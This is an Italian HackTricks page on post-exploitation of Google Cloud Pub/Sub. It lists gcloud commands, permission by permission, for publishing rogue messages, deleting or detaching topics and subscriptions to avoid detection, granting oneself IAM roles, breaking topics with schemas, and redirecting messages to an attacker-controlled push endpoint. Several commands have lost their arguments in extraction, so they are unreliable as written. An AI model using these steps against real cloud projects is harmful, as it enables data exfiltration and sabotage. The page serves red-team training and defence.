GCP - Pub/Sub Post Exploitation

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Pub/Sub

Per maggiori informazioni su Pub/Sub consulta la seguente pagina:

GCP - Pub/Sub Enum

pubsub.topics.publish

Pubblica un messaggio in un topic, utile per inviare dati inattesi e attivare funzionalità impreviste o exploit vulnerabilities:

Pubblica un messaggio nel topic ```bash # Publish a message in a topic gcloud pubsub topics publish --message "Hello!" ```

pubsub.topics.detachSubscription

Utile per impedire a subscription di ricevere messaggi, magari per evitare il rilevamento.

Staccare subscription da topic ```bash gcloud pubsub topics detach-subscription ```

pubsub.topics.delete

Utile per impedire a una subscription di ricevere messaggi, magari per evitare il rilevamento.
È possibile eliminare un topic anche se ci sono subscription collegate.

Elimina topic ```bash gcloud pubsub topics delete ```

pubsub.topics.update

Usa questo permesso per aggiornare alcune impostazioni del topic per interromperne il funzionamento, come --clear-schema-settings, --message-retention-duration, --message-storage-policy-allowed-regions, --schema, --schema-project, --topic-encryption-key

pubsub.topics.setIamPolicy

Concediti il permesso per eseguire uno qualsiasi degli attacchi precedenti.

# Add Binding
gcloud pubsub topics add-iam-policy-binding <TOPIC_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"

# Remove Binding
gcloud pubsub topics remove-iam-policy-binding <TOPIC_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"

# Change Policy
gcloud pubsub topics set-iam-policy <TOPIC_NAME> \
<(echo '{
"bindings": [
{
"role": "<ROLE_OR_CUSTOM_ROLE>",
"members": [
"serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com"
]
}
]
}') \
--project=<PROJECT_ID>

pubsub.subscriptions.create,pubsub.topics.attachSubscription , (pubsub.subscriptions.consume)

Recupera tutti i messaggi da un web server:

Crea una push subscription per ricevere i messaggi ```bash # Crete push subscription and recieve all the messages instantly in your web server gcloud pubsub subscriptions create --topic --push-endpoint https:// ```

Crea una sottoscrizione e usala per prelevare messaggi:

Crea una sottoscrizione pull e recupera i messaggi ```bash # This will retrive a non ACKed message (and won't ACK it) gcloud pubsub subscriptions create --topic

You also need pubsub.subscriptions.consume for this

gcloud pubsub subscriptions pull

This command will wait for a message to be posted

</details>

### `pubsub.subscriptions.delete`

**Eliminare una subscription** potrebbe essere utile per interrompere un sistema di elaborazione dei log o qualcosa di simile:

<details>

<summary>Elimina subscription</summary>
```bash
gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>

pubsub.subscriptions.update

Usa questo permesso per aggiornare qualche impostazione in modo che i messaggi vengano salvati in un posto a cui puoi accedere (URL, Big Query table, Bucket) oppure semplicemente per interromperne il funzionamento.

Aggiorna endpoint della subscription ```bash gcloud pubsub subscriptions update --push-endpoint ```

pubsub.subscriptions.setIamPolicy

Concediti i permessi necessari per eseguire uno qualsiasi degli attacchi commentati in precedenza.

pubsub.schemas.attach, pubsub.topics.update,(pubsub.schemas.create)

Associa uno schema a un topic in modo che i messaggi non lo soddisfino e quindi il topic venga interrotto.
Se non ci sono schemi potresti doverne creare uno.

Crea un file schema e allegalo al topic ```json:schema.json { "namespace": "com.example", "type": "record", "name": "Person", "fields": [ { "name": "name", "type": "string" }, { "name": "age", "type": "int" } ] } ```
# Attach new schema
gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
--schema=projects/<project-name>/schemas/<topic-id> \
--message-encoding=json

pubsub.schemas.delete

Questo potrebbe sembrare che eliminando uno schema sarai in grado di inviare messaggi che non soddisfano lo schema. Tuttavia, poiché lo schema verrà eliminato, nessun messaggio entrerà effettivamente nel topic. Quindi questo è INUTILE:

Elimina schema (inutile) ```bash gcloud pubsub schemas delete ```

pubsub.schemas.setIamPolicy

Concediti le autorizzazioni necessarie per eseguire uno qualsiasi degli attacchi menzionati in precedenza.

pubsub.snapshots.create, pubsub.snapshots.seek

Questo creerà uno snapshot di tutti i messaggi unACKed e li reintrodurrà nella subscription. Non molto utile per un attacker ma ecco:

Crea uno snapshot e fai seek su di esso ```bash gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \ --subscription=YOUR_SUBSCRIPTION_NAME gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \ --snapshot=YOUR_SNAPSHOT_NAME ```

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks